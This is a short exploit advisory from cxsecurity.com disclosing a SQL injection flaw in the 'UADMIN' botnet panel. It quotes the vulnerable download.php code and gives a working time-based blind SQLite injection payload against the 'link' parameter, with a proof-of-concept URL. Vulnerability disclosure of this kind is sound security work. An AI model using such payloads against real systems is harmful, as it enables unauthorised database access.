UADMIN Botnet SQL Injection

2020.03.18
Credit: n4pst3r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################ # Exploit Title: UADMIN Botnet - SQL Injection Vulnerability # Google Dork: n/a # Date: 16/03/2020 # Exploit Author: n4pst3r # Vendor Homepage: unkn0wn # Software Link: unkn0wn # Version: unkn0wn # Tested on: Windows 10, Kali # CVE : n/a ################################ # Vuln-Code: download.php $link=$_GET['link']; $agent=esc__($_SERVER['HTTP_USER_AGENT']); if(isset($_GET['botid'])){ $botid=esc__($_GET['botid']); }else{ $botid='unknown'; }; ################################ Attack Response & PoC: --- Parameter: link (GET) Type: time-based blind Title: SQLite > 2.0 OR time-based blind (heavy query) Payload: link=1' OR 7990=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- nwGY --- http://127.0.0.1/ush/gates/token.php?link=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top